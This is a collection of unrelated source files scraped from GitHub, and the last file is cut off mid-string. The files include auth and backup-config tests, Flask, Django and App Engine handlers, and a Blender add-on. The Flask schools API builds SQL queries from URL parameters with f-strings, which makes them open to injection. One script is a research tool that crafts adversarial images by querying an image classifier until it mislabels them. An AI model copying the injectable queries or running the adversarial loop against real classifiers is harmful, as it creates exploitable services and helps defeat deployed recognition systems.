+{"seq_id":"15425074906","text":"import argparse\n\nimport fixtures\nimport mock\nimport requests\nfrom stevedore import extension\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom essential.apiclient import auth\nfrom essential.apiclient import client\nfrom essential.apiclient import fake_client\nfrom essential import test\n\n\nTEST_REQUEST_BASE = {\n 'verify': True,\n}\n\n\ndef mock_http_request(resp=None):\n \"\"\"Mock an HTTP Request.\"\"\"\n if not resp:\n resp = {\n \"access\": {\n \"token\": {\n \"expires\": \"12345\",\n \"id\": \"FAKE_ID\",\n \"tenant\": {\n \"id\": \"FAKE_TENANT_ID\",\n }\n },\n \"serviceCatalog\": [\n {\n \"type\": \"compute\",\n \"endpoints\": [\n {\n \"region\": \"RegionOne\",\n \"adminURL\": \"http://localhost:8774/v1.1\",\n \"internalURL\": \"http://localhost:8774/v1.1\",\n \"publicURL\": \"http://localhost:8774/v1.1/\",\n },\n ],\n },\n ],\n },\n }\n\n auth_response = fake_client.TestResponse({\n \"status_code\": 200,\n \"text\": json.dumps(resp),\n })\n return mock.Mock(return_value=(auth_response))\n\n\ndef requested_headers(cs):\n \"\"\"Return requested passed headers.\"\"\"\n return {\n 'User-Agent': cs.user_agent,\n 'Content-Type': 'application/json',\n }\n\n\nclass BaseFakePlugin(auth.BaseAuthPlugin):\n def _do_authenticate(self, http_client):\n pass\n\n def token_and_endpoint(self, endpoint_type, service_type):\n pass\n\n\nclass GlobalFunctionsTest(test.BaseTestCase):\n\n def test_load_auth_system_opts(self):\n self.useFixture(fixtures.MonkeyPatch(\n \"os.environ\",\n {\"OS_TENANT_NAME\": \"fake-project\",\n \"OS_USERNAME\": \"fake-username\"}))\n parser = argparse.ArgumentParser()\n auth.load_auth_system_opts(parser)\n options = parser.parse_args(\n [\"--os-auth-url=fake-url\", \"--os_auth_system=fake-system\"])\n self.assertEqual(options.os_tenant_name, \"fake-project\")\n self.assertEqual(options.os_username, \"fake-username\")\n self.assertEqual(options.os_auth_url, \"fake-url\")\n self.assertEqual(options.os_auth_system, \"fake-system\")\n\n\nclass MockEntrypoint(object):\n def __init__(self, name, plugin):\n self.name = name\n self.plugin = plugin\n\n\nclass AuthPluginTest(test.BaseTestCase):\n @mock.patch.object(requests.Session, \"request\")\n @mock.patch.object(extension.ExtensionManager, \"map\")\n def test_auth_system_success(self, mock_mgr_map, mock_request):\n \"\"\"Test that we can authenticate using the auth system.\"\"\"\n class FakePlugin(BaseFakePlugin):\n def authenticate(self, cls):\n cls.request(\n \"POST\", \"http://auth/tokens\",\n json={\"fake\": \"me\"}, allow_redirects=True)\n\n mock_mgr_map.side_effect = (\n lambda func: func(MockEntrypoint(\"fake\", FakePlugin)))\n\n mock_request.side_effect = mock_http_request()\n\n auth.discover_auth_systems()\n plugin = auth.load_plugin(\"fake\")\n cs = client.HTTPClient(auth_plugin=plugin)\n cs.authenticate()\n\n headers = requested_headers(cs)\n\n mock_request.assert_called_with(\n \"POST\",\n \"http://auth/tokens\",\n headers=headers,\n data='{\"fake\": \"me\"}',\n allow_redirects=True,\n **TEST_REQUEST_BASE)\n\n @mock.patch.object(extension.ExtensionManager, \"map\")\n def test_discover_auth_system_options(self, mock_mgr_map):\n \"\"\"Test that we can load the auth system options.\"\"\"\n class FakePlugin(BaseFakePlugin):\n @classmethod\n def add_opts(cls, parser):\n parser.add_argument('--auth_system_opt',\n default=False,\n action='store_true',\n help=\"Fake option\")\n\n mock_mgr_map.side_effect = (\n lambda func: func(MockEntrypoint(\"fake\", FakePlugin)))\n\n parser = argparse.ArgumentParser()\n auth.discover_auth_systems()\n auth.load_auth_system_opts(parser)\n opts, _args = parser.parse_known_args(['--auth_system_opt'])\n\n self.assertTrue(opts.auth_system_opt)\n\n @mock.patch.object(extension.ExtensionManager, \"map\")\n def test_parse_auth_system_options(self, mock_mgr_map):\n \"\"\"Test that we can parse the auth system options.\"\"\"\n class FakePlugin(BaseFakePlugin):\n opt_names = [\"fake_argument\"]\n\n mock_mgr_map.side_effect = (\n lambda func: func(MockEntrypoint(\"fake\", FakePlugin)))\n\n auth.discover_auth_systems()\n plugin = auth.load_plugin(\"fake\")\n\n plugin.parse_opts([])\n self.assertIn(\"fake_argument\", plugin.opts)\n","repo_name":"gaolichuang/py-essential","sub_path":"tests/apiclient/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13298880148","text":"# -*- coding: UTF-8 -*-\n\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\nimport os\nfrom flask import Flask, jsonify, abort, request, make_response, url_for\n# from flask_httpauth import HTTPBasicAuth\nfrom tenacity import retry, wait_fixed\nfrom geojson import Feature, Point, FeatureCollection\n\nPOSTGRES_USER = os.getenv(\"POSTGRES_USER\")\nPOSTGRES_PASSWORD = os.getenv(\"POSTGRES_PASSWORD\")\nPOSTGRES_DBNAME = os.getenv(\"POSTGRES_DBNAME\")\nPOSTGRES_HOST = os.getenv(\"POSTGRES_HOST\")\n\napp = Flask(__name__, static_url_path = \"\")\n\n# FIXME: limit when domain is defined\nfrom flask_cors import CORS, cross_origin\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n# auth = HTTPBasicAuth()\n# @auth.get_password\n# def get_password(username):\n# if username == 'miguel':\n# return 'python'\n# return None\n# @auth.error_handler\n# def unauthorized():\n# return make_response(jsonify( { 'error': 'Unauthorized access' } ), 403)\n# # return 403 instead of 401 to prevent browsers from displaying the default auth dialog\n\n# wait to see if db is up, 5 seconds between retries\n@retry(wait=wait_fixed(5))\ndef init_api():\n try:\n con = psycopg2.connect(dbname=POSTGRES_DBNAME, user=POSTGRES_USER, host=POSTGRES_HOST, password=POSTGRES_PASSWORD)\n con.set_session(autocommit=True)\n except Exception as e:\n print(\"I am unable to connect to the database.\")\n print(e)\n abort(400)\n\n cur = con.cursor(cursor_factory = psycopg2.extras.RealDictCursor)\n\n # 2000 meters\n searchRadius = 2000\n\n @app.errorhandler(400)\n def not_found(error):\n return make_response(jsonify( { 'error': 'Bad request' } ), 400)\n\n @app.errorhandler(404)\n def not_found(error):\n return make_response(jsonify( { 'error': 'Not found' } ), 404)\n\n @app.route('/', methods = ['GET'])\n # @auth.login_required\n def get_hello():\n return 'Hello World.'\n\n @app.route('/v1/schools/id/', methods = ['GET'])\n # sample url\n # http://localhost:8080/v1/schools/id/091383\n # @auth.login_required\n def get_school_id(cd_unidade_educacao):\n try:\n if validate_school_id_request(cd_unidade_educacao):\n cur.execute(f\"\"\"\n SELECT *\n FROM unidades_educacionais_ativas_endereco_contato\n WHERE cd_unidade_educacao = '{cd_unidade_educacao}'\n \"\"\")\n schools = cur.fetchall()\n return jsonify( { 'results': schools } )\n else:\n abort(400)\n except Exception as e:\n print(e)\n abort(400)\n\n @app.route('/v1/schools/radius//', methods = ['GET'])\n # sample url\n # http://localhost:8080/v1/schools/radius/-46.677023599999984/-23.5814295\n # @auth.login_required\n def get_schoolradius(lat, lon):\n try:\n if validate_wait_request(lat, lon):\n cur.execute(f\"\"\"SELECT *\n FROM unidades_educacionais_ativas_endereco_contato\n WHERE ST_DWithin(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326), {searchRadius})\n \"\"\")\n rowsSchools = cur.fetchall()\n return jsonify( { 'results': rowsSchools } )\n else:\n abort(400)\n except Exception as e:\n print(e)\n abort(400)\n\n\n @app.route('/v1/schools/radius/wait///', methods = ['GET'])\n # sample url\n # http://localhost:8080/v1/schools/radius/wait/-46.677023599999984/-23.5814295/27\n # @auth.login_required\n def get_schoolradiuswait(lat, lon, cd_serie):\n try:\n # FIXME: validate by bouding box too\n if validate_wait_request(lat, lon, cd_serie):\n cur.execute(f\"\"\"\n SELECT *, (ST_Distance(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326)) / 1000) as distance FROM unidades_educacionais_ativas_endereco_contato AS u\n LEFT JOIN unidades_educacionais_infantil_vagas_serie as v\n ON u.cd_unidade_educacao = v.cd_unidade_educacao\n WHERE ST_DWithin(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326), {searchRadius})\n AND v.vagas_cd_serie_{cd_serie} IS NOT NULL\n ORDER BY distance\n \"\"\")\n rowsSchools = cur.fetchall()\n cur.execute(f\"\"\"\n SELECT count(DISTINCT cd_solicitacao_matricula_random)\n FROM unidades_educacionais_ativas_endereco_contato AS u\n LEFT JOIN solicitacao_matricula_grade_dw AS s\n ON u.cd_unidade_educacao::integer = s.cd_unidade_educacao\n WHERE ST_DWithin(geom::geography, ST_SetSRID(ST_MakePoint({lon}, {lat}), 4326), {searchRadius})\n AND s.cd_serie_ensino = {cd_serie}\n \"\"\")\n rowsWait = cur.fetchall()\n cur.execute(f\"\"\"\n SELECT dt_solicitacao as updated_at\n FROM solicitacao_matricula_grade_dw_atualizacao\n \"\"\")\n rowsUpdated = cur.fetchall()\n results = {'wait': rowsWait[0]['count'], 'wait_updated_at': rowsUpdated[0]['updated_at'], 'schools': rowsSchools}\n return jsonify( { 'results': results } )\n else:\n abort(400)\n except Exception as e:\n print(e)\n abort(400)\n\n def validate_wait_request(lat, lon, cd_serie=1):\n if float(lat) and float(lon) and (cd_serie in [1, 4, 27, 28]):\n return True\n else:\n return False\n\n def validate_school_id_request(id):\n if float(id):\n return True\n else:\n return False\n\ninit_api()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"prefeiturasp/SME-fila-da-creche-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"75066601154","text":"import time\n\n\ndef clock(func):\n def clocked(*args, **kwargs):\n t0 = time.time()\n\n result = func(*args, **kwargs) # вызов декорированной функции\n\n elapsed = time.time() - t0\n name = func.__name__\n arg_1st = []\n if args:\n arg_1st.append(', '.join(repr(arg) for arg in args))\n if kwargs:\n pairs = ['%s=%r' % (k, w) for k, w in sorted(kwargs.items())]\n arg_1st.append(', '.join(pairs))\n arg_str = ', '.join(arg_1st)\n print('[%0.8fs] %s(%s) -> %r' % (elapsed, name, arg_str, result))\n return result\n return clocked\n\n\n# Подобным образом реализован декоратор @cache\n_fib_cache = {1: 1, 2: 1} # ключ - номер числа, значения - число Фибоначчи\n\n@clock\ndef mem_fib(n):\n result = _fib_cache.get(n)\n if result is None:\n result = mem_fib(n-2) + mem_fib(n-1)\n _fib_cache[n] = result\n return result\n\nprint('fib(20) =', mem_fib(25))","repo_name":"avdivo/lesson_1","sub_path":"my_tasks/cache_and_clock.py","file_name":"cache_and_clock.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69804458436","text":"from nonebot import on_command\nfrom nonebot.typing import T_State\nfrom nonebot.adapters import Bot, Event\n\nhelp_ = on_command('help', aliases={'帮助', 'searchbot'})\n\n\n@help_.handle()\nasync def handle_first_receive(bot: Bot, event: Event, state: T_State):\n await help_.send(\"\"\"\n命令起始符号:? ¿ / . 或(直接开始命令)\n\n以下为命令列表:\n sou/搜/搜索/search/sch/?/?/¿ + 关键词\n 获取关键词的搜索结果截图\n \n help/帮��/searchbot\n 获取本段帮助\"\"\")\n","repo_name":"Cynthia7979/searchbot-qq","sub_path":"src/plugins/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31513876140","text":"import re\n\nFILE = open(\"digits.txt\",\"r\")\nit = 0\nfor line in FILE:\n it += 1 \n data = line.split()\n fa = open(str(it) + \".in\",\"w\")\n\n j = 0\n while j < len(data) - 1:\n fa.write(data[j])\n fa.write('\\n')\n j += 1\n fb = open(str(it) + \".out\",\"w\")\n fb.write(data[j])\n","repo_name":"kc97ble/Problems","sub_path":"digits (1)/statement/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"72565038274","text":"from django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.views.generic import View\nfrom django.shortcuts import render, redirect\nfrom django.core.files.base import ContentFile\n\nfrom datetime import datetime\n\nfrom service.forms import CreateOrderForm\n\nfrom .models import Order, Photo\n\n\nclass ServicePage(View):\n def get(self, request):\n form = CreateOrderForm()\n return render(request, 'service/index.html', context={'form': form})\n\n def post(self, request):\n form = CreateOrderForm(request.POST, request.FILES)\n\n if form.is_valid():\n cd = form.cleaned_data\n order = Order.objects.create(last_name=cd['last_name'],\n first_name=cd['first_name'],\n tel=cd['tel'],\n size=cd['size'],\n quantity=cd['quantity'],\n comment=cd['comment'],\n total_price=cd['total_price'],\n accept_conditions=cd['accept_conditions'])\n for f in request.FILES.getlist('photos'):\n data = f.read()\n date = datetime.now()\n photo = Photo(order=order)\n photo.photos.save(f'{date.minute}{date.second}.{f.name.split(\".\")[-1]}', ContentFile(data))\n photo.save()\n subject = f'{cd[\"tel\"]} | {cd[\"last_name\"]} | {cd[\"size\"]} x {cd[\"quantity\"]} = {cd[\"total_price\"]}р. '\n message = f'{cd[\"tel\"]} \\n {cd[\"last_name\"]} \\n {cd[\"first_name\"]} \\n {cd[\"size\"]} x {cd[\"quantity\"]} = {cd[\"total_price\"]}р. \\n {cd[\"comment\"]} '\n send_mail(subject=subject, message=message, from_email=settings.EMAIL_HOST_USER, recipient_list=['dpmbg@yandex.ru', 'pmbg@yandex.ru'])\n messages.success(request, f'Ваш заказ успешно зарегистрирован! '\n f'Для оплаты заказа вам необходимо пополнить кошелек ЯндексДеньги на сумму в размере - {cd[\"total_price\"]} руб. ')\n return redirect('ServicePage')\n return HttpResponse('Error')\n\n","repo_name":"Blastz13/micro_printing_service","sub_path":"service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"8614823496","text":"import frappe\nfrom frappe.utils.nestedset import get_descendants_of\n\n\n@frappe.whitelist()\ndef filter_territory(doctype, txt, searchfield, start, page_len, filters):\n\t\"\"\"filter territory\"\"\"\n\n\tterritory_list = get_descendants_of(\"Territory\", filters.get(\"region\"))\n\tterritory_list.append(filters.get(\"region\"))\n\n\treturn frappe.get_all('Territory',\n\t\tfilters={\n\t\t\t'parent_territory': ('in', territory_list),\n\t\t\t'territory_name': (\"like\", \"%{0}%\".format(txt))\n\t\t},\n\t\tfields=[\"name\"],\n\t\tas_list=1)\n\ndef rearrange_standard_fields():\n\t\"\"\"Rearrange standard field in lead doctype\"\"\"\n\tcount = 1\n\tfor df in frappe.get_meta(\"Lead\").get(\"fields\"):\n\t\tif df.fieldname in [\"territory\", \"address_html\", \"contact_html\", \"contact_by\"]:\n\t\t\tcount= count + 1\n\t\t\tfrappe.db.sql(\"\"\"UPDATE `tabDocField` SET idx={0} WHERE fieldname=%s and parent='Lead' \"\"\".format(count), df.fieldname, as_dict=True)\n","repo_name":"Bloomstack/bloomstack_core","sub_path":"bloomstack_core/hook_events/lead.py","file_name":"lead.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"71002781954","text":"\"\"\"\r\nCreated on Sun May 3 09:32:13 2020\r\n\r\n@author: Hadi Zanddizari\r\nemail: hadiz@usf.edu\r\n\"\"\"\r\n##############################################################################################################\r\nfrom __future__ import print_function\r\nimport tensorflow as tf\r\nfrom PIL import Image\r\nimport glob\r\nimport numpy as np\r\nimport os\r\nfrom matplotlib import pyplot as plt\r\nimport scipy.misc\r\nfrom skimage.transform import resize\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nfrom scipy.fftpack import dct,idct \r\n##############################################################################################################\r\ndef load_images_from_folder(folder):\r\n images = [];listName = []\r\n for filename in os.listdir(folder):\r\n img = cv2.imread(os.path.join(folder,filename))\r\n if img is not None:\r\n images.append(img)\r\n listName.append(filename)\r\n return images,listName\r\n##############################################################################################################\r\ndef Klargest(x,k):\r\n nk = k *k *3;\r\n vx = x.reshape(-1);\r\n ss = np.argsort(np.multiply(-1, np.absolute(vx)),axis=0);#-1 for descending sort\r\n idx_K_LaS = np.zeros(vx.shape);\r\n idx_K_LaS [ss[0:nk]] = 1;\r\n return idx_K_LaS \r\n##############################################################################################################\r\n#path of test sample\r\ninput_path='PATH TO legitimate sample'\r\noutput_path='PATH TO Output Folder to SAVE Adversarial Example'\r\nclasses=['spyder','dog','cat','squirrel','sheep','butterfly','horse','elephant','cow','chicken']\r\n#link of public dataset: https://www.kaggle.com/alessiocorrado99/animals10\r\n# In this example,We input an image with a 'chicken' label,\r\n#if the input sample has another label, the argument of 'classes[9]' should be updated accordingly. \r\noriginal_label =classes[9]; \r\nlist0 = [];listName0 = []; \r\nlist0,listName0 = load_images_from_folder(input_path)\r\n##############################################################################################################\r\ninterpreter = tf.lite.Interpreter(model_path=\"model.tflite\")\r\ninterpreter.allocate_tensors()\r\n# Get input and output tensors.\r\ninput_details = interpreter.get_input_details();print()\r\noutput_details = interpreter.get_output_details();\r\nprint(output_details)\r\ninput_shape = input_details[0]['shape']\r\n##############################################################################################################\r\n#allList = list0[0:100] +list1[0:100] +list2[0:100] +list3[0:100] +list4[0:100] +list5[0:100] +list6[0:100] +list7[0:100] +list8[0:100]+ list9[0:100] \r\nallList = list0 \r\nk=16; #number of nonzeros \r\nalpha = 0.001 # MSE\r\nQueryNumber = 1000; #number of query\r\nL =len(allList);\r\nctr_k = 0;ctr_l = 0;ctr_a = 0;\r\nidx_k = np.zeros((L,1));\r\n\r\nfor idx in range(L):\r\n img1 = allList[idx];\r\n legitimateImg=np.zeros(img1.shape,np.uint8);\r\n legitimateImg[:,:,0]=img1[:,:,2];legitimateImg[:,:,1]=img1[:,:,1];legitimateImg[:,:,2]=img1[:,:,0];\r\n legImg = resize(legitimateImg, (224, 224));#img = img/255\r\n \r\n # Testing the model to observe if it initisally predicts the legitimate sample correctly\r\n input_data = (255*np.expand_dims(legImg, axis=0)).astype(np.uint8);\r\n interpreter.set_tensor(input_details[0]['index'], input_data)\r\n interpreter.invoke()\r\n output_data_leg = interpreter.get_tensor(output_details[0]['index'])\r\n pro_leg = (output_data_leg[0][[output_data_leg.argmax(axis=-1)[0]]][0]) / np.sum(output_data_leg)\r\n label = classes[output_data_leg.argmax(axis=-1)[0]];\r\n \r\n\r\n if label!=original_label:\r\n print('This sample has already been misclassified by the model---Try another sample');\r\n continue;\r\n \r\n################################ adding noise to the k largest components in sparse domain ##############\r\n #DCT Transformation\r\n yd1 = dct(legImg, axis=0, norm=\"ortho\");\r\n yd2 = dct(yd1, axis=1, norm=\"ortho\");\r\n idx_K_LaS = Klargest(yd2,k) # position of K LaS components \r\n model_fooled = False;\r\n \r\n for q in range(QueryNumber):\r\n y = np.random.normal(0,1,legImg.shape)\r\n yd1 = dct(y, axis=0, norm=\"ortho\");\r\n yd2 = dct(yd1, axis=1, norm=\"ortho\"); \r\n if not model_fooled: \r\n yd3 = np.zeros(yd2.shape);\r\n temp = yd2.reshape(-1);\r\n yd3 = (np.multiply(temp,idx_K_LaS )).reshape(224,224,3) \r\n #inverse DCT Transformation\r\n iyd1 = idct(yd3, axis=1, norm=\"ortho\");\r\n iyd2 = idct(iyd1, axis=0, norm=\"ortho\") \r\n yLF = np.sqrt(alpha) * iyd2 / np.sqrt(np.square(iyd2).mean(axis=None))#limited noise\r\n xAdvKlargest = np.add(yLF,legImg)# adding limited noise to the legitimate sample \r\n MSE = (np.square(yLF)).mean(axis=None); #print(MSE)\r\n############sending Query to the the TFLite model trained by Google Cloud Vision for evaluation\r\n input_data = (255*np.expand_dims(xAdvKlargest, axis=0)).astype(np.uint8);\r\n interpreter.set_tensor(input_details[0]['index'], input_data)\r\n interpreter.invoke()\r\n output_data = interpreter.get_tensor(output_details[0]['index'])\r\n pro = (output_data[0][[output_data.argmax(axis=-1)[0]]][0]) / np.sum(output_data)\r\n if classes[output_data.argmax(axis=-1)[0]]!= label:\r\n print('================================================');\r\n print('------The model is fooled in query number: ', q);\r\n print('legitimate predicted label was: ', classes[output_data_leg.argmax(axis=-1)[0]],' ', pro_leg)\r\n print(output_data_leg)\r\n\r\n print(' Adversarial predicted label is: ', classes[output_data.argmax(axis=-1)[0]],' ', pro )\r\n print(output_data)\r\n print(\"************************\")\r\n model_fooled = True;\r\n \r\n temp_img=np.zeros(xAdvKlargest.shape);\r\n temp_img[:,:,0]=xAdvKlargest[:,:,2];temp_img[:,:,1]=xAdvKlargest[:,:,1];temp_img[:,:,2]=xAdvKlargest[:,:,0];\r\n cv2.imwrite(output_path+'adv.jpg', 255*temp_img)\r\n break\r\n else:\r\n print(\"query number: \" + str(q) +' unsuccessful!')\r\n\r\n\r\n##############################################################################################################\r\n\r\nplt.imshow(legImg);plt.title('Legitimate image: '+ classes[output_data_leg.argmax(axis=-1)[0]],);plt.show()\r\nplt.imshow(xAdvKlargest); plt.title('Adversarial image: '+classes[output_data.argmax(axis=-1)[0]]);plt.show()\r\n","repo_name":"hadizand/LaS-Adversarial-example","sub_path":"GoogleAPI/GoogleCloudVisionAttack.py","file_name":"GoogleCloudVisionAttack.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25706580334","text":"import json\nimport os\nimport unittest\n\nfrom httpretty import HTTPretty, httprettified\n\nfrom rcbu.client.connection import Connection\nfrom rcbu.common.constants import IDENTITY_TOKEN_URL\nimport rcbu.common.schedule as schedule\nimport tests.mock.auth as mock_auth\nimport tests.mock.configuration as mock_config\nimport rcbu.client.backup_configuration as backup_config\nfrom rcbu.common.exceptions import (\n DisconnectedError, InconsistentInclusionsError\n)\n\n\ndef _mock_auth(status):\n reply = mock_auth.authenticate()\n HTTPretty.register_uri(HTTPretty.POST, IDENTITY_TOKEN_URL,\n status=status, body=json.dumps(reply))\n\n\ndef _mock_config(status, endpoint, config_id):\n reply = mock_config.backup_configuration(config_id)\n url = '{0}/{1}/{2}'.format(endpoint, 'backup-configuration', config_id)\n HTTPretty.register_uri(HTTPretty.GET, url, json.dumps(reply))\n\n\ndef _quick_config(connection=None):\n return backup_config.from_dict(mock_config.backup_configuration(),\n connection=connection)\n\n\nclass TestLoadBackupConfiguration(unittest.TestCase):\n def test_from_dict_works_as_expected(self):\n body = mock_config.backup_configuration()\n config = backup_config.from_dict(body)\n self.assertEqual(config.id, 0)\n self.assertEqual(config.agent_id, 1)\n self.assertEqual(config.notify_on_failure, True)\n self.assertEqual(config.notify_on_success, False)\n self.assertEqual(config.email,\n 'mock@mock.com')\n self.assertEqual(config.name, 'mock')\n self.assertEqual(config.encrypted, False)\n self.assertEqual(config.enabled, True)\n self.assertEqual(config.deleted, False)\n\n def test_from_dict_throws_key_error_when_missing_attr(self):\n data_keys = mock_config.backup_configuration().keys()\n for key in data_keys:\n mock = mock_config.backup_configuration()\n del mock[key]\n with self.assertRaises(KeyError):\n backup_config.from_dict(mock)\n\n\nclass TestBackupConfiguration(unittest.TestCase):\n @httprettified\n def setUp(self):\n _mock_auth(200)\n self.connection = Connection(username='a', region='dfw', password='a')\n config_api = mock_config.backup_configuration()\n self.config = backup_config.from_dict(config_api, self.connection)\n\n def test_id_matches_expected(self):\n self.assertEqual(self.config.id, 0)\n\n def test_agent_id_matches_expected(self):\n self.assertEqual(self.config.agent_id, 1)\n\n def test_name_matches_expected(self):\n self.assertEqual(self.config.name, 'mock')\n\n def test_notification_settings_match_expected(self):\n self.assertEqual(self.config.email, 'mock@mock.com')\n self.assertEqual(self.config.notify_on_success, False)\n self.assertEqual(self.config.notify_on_failure, True)\n\n def test_enabled_matches_expected(self):\n self.assertEqual(self.config.enabled, True)\n\n def test_encrypted_matches_expected(self):\n self.assertEqual(self.config.encrypted, False)\n\n def test_deleted_matches_expected(self):\n self.assertEqual(self.config.deleted, False)\n\n def test_schedule_matches_expected(self):\n self.assertEqual(self.config.schedule, schedule.manually())\n\n def test_reschedule_works(self):\n self.config.reschedule(schedule.hourly(13))\n self.assertEqual(self.config.schedule, schedule.hourly(13))\n\n def test_update_notification_settings_works(self):\n self.config.update_notification_settings(email='woot',\n notify_on_failure=False,\n notify_on_success=True)\n self.assertEqual(self.config.email, 'woot')\n self.assertEqual(self.config.notify_on_success, True)\n self.assertEqual(self.config.notify_on_failure, False)\n\n def test_rename_works(self):\n self.config.rename('woot')\n self.assertEqual(self.config.name, 'woot')\n\n def test_disconneted_error_raised_if_no_connection(self):\n self.config.connect(None)\n with self.assertRaises(DisconnectedError):\n self.config.enable()\n\n @httprettified\n def _test_toggle(self, enabled=True):\n url = '{0}/{1}/{2}/{3}'.format(self.connection.host,\n 'backup-configuration', 'enable',\n self.config.id)\n HTTPretty.register_uri(HTTPretty.POST, url, status=200,\n body=json.dumps({'IsActive': enabled}))\n if enabled:\n self.config.enable()\n else:\n self.config.disable()\n self.assertEqual(self.config.enabled, enabled)\n\n def test_disable_works(self):\n self._test_toggle(enabled=False)\n\n def test_enable_works(self):\n self._test_toggle(enabled=True)\n\n @httprettified\n def test_delete_works(self):\n url = '{0}/backup-configuration/{1}'.format(self.connection.host,\n self.config.id)\n HTTPretty.register_uri(HTTPretty.DELETE, url, status=204)\n self.assertEqual(self.config.deleted, False)\n self.config.delete()\n self.assertEqual(self.config.deleted, True)\n\n def test_excluding_nonexistent_path_raises_error(self):\n with self.assertRaises(IOError):\n self.config.exclude('not_found')\n\n def test_including_nonexistent_path_raises_error(self):\n with self.assertRaises(IOError):\n self.config.exclude('not_found')\n\n def test_including_duplicates_strips_dups(self):\n name = 'setup.py'\n self.config.include([name, name])\n self.assertEqual(self.config.inclusions, {os.path.realpath(name)})\n\n def test_excluding_duplicates_strips_dups(self):\n name = 'setup.py'\n self.config.exclude([name, name])\n self.assertEqual(self.config.exclusions, {os.path.realpath(name)})\n\n def test_excluding_included_files_raises_inconsistent(self):\n name = 'setup.py'\n self.config.include([name])\n with self.assertRaises(InconsistentInclusionsError):\n self.config.exclude([name])\n\n def test_including_excluded_files_raises_inconsistent(self):\n name = 'setup.py'\n self.config.exclude([name])\n with self.assertRaises(InconsistentInclusionsError):\n self.config.include([name])\n\n @httprettified\n def test_reload_works(self):\n url = '{0}/backup-configuration/{1}'.format(self.connection.host,\n self.config.id)\n conf = mock_config.backup_configuration(agent_id=100)\n HTTPretty.register_uri(HTTPretty.GET, url, status=200,\n body=json.dumps(conf))\n self.config.reload()\n self.assertEqual(self.config.agent_id, 100)\n\n @httprettified\n def test_update_works(self):\n url = '{0}/backup-configuration/{1}'.format(self.connection.host,\n self.config.id)\n HTTPretty.register_uri(HTTPretty.PUT, url, status=200)\n self.assertIsNone(self.config.update())\n\n @httprettified\n def test_create_works(self):\n url = '{0}/backup-configuration'.format(self.connection.host)\n HTTPretty.register_uri(HTTPretty.POST, url, status=200,\n body=json.dumps({'BackupConfigurationId': 100}))\n old_id = self.config.id\n self.config.create()\n self.assertEqual(self.config.id, 100)\n self.assertNotEqual(self.config.id, old_id)\n","repo_name":"rackerlabs/cbu-sdk-python","sub_path":"deprecated/tests/unit/client/test_backup_configuration.py","file_name":"test_backup_configuration.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"28225439907","text":"import webapp2\nimport logging\n\nclass GeoLocation(webapp2.RequestHandler):\n def get(self):\n ip = self.request.remote_addr\n\n if ip == \"127.0.0.1\":\n countryCode = \"gb\"\n else:\n countryCode = self.request.headers['X-AppEngine-country']\n\n logging.info(\"IP is '%s', country code is %s\" % (ip, countryCode))\n\n if self.request.get(\"callback\"): # JSONP Request\n self.response.headers['Content-Type'] = 'text/javascript'\n self.response.out.write(self.request.get(\"callback\") + \"('\")\n self.response.out.write(countryCode)\n self.response.out.write(\"')\")\n else:\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(countryCode)\n\n\napp = webapp2.WSGIApplication([('/geo-location', GeoLocation)], debug=True)\n","repo_name":"guardian/geo-location","sub_path":"geo-location.py","file_name":"geo-location.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9140309488","text":"from bpy.props import (\n StringProperty,\n BoolProperty,\n EnumProperty,\n FloatProperty,\n IntProperty,\n FloatVectorProperty,\n)\nfrom photogrammetry_importer.utility.blender_utility import (\n adjust_render_settings_if_possible,\n)\nfrom photogrammetry_importer.utility.blender_camera_utility import (\n principal_points_initialized,\n set_principal_point_for_cameras,\n add_cameras,\n add_camera_animation,\n)\nfrom photogrammetry_importer.types.camera import Camera\n\n\nclass CameraImportProperties:\n \"\"\"\n This class encapsulates Blender UI properties that are required to\n visualize the reconstructed cameras correctly.\n \"\"\"\n\n image_fp_items = [\n (Camera.IMAGE_FP_TYPE_NAME, \"File Name\", \"\", 1),\n (Camera.IMAGE_FP_TYPE_RELATIVE, \"Relative Path\", \"\", 2),\n (Camera.IMAGE_FP_TYPE_ABSOLUTE, \"Absolute Path\", \"\", 3),\n ]\n image_fp_type: EnumProperty(\n name=\"Image File Path Type\",\n description=\"Choose how image file paths are treated, \"\n + \"i.e. absolute path, relative path or file name\",\n items=image_fp_items,\n )\n image_dp: StringProperty(\n name=\"Image Directory\",\n description=\"Assuming that the SfM reconstruction result is \"\n + \"located 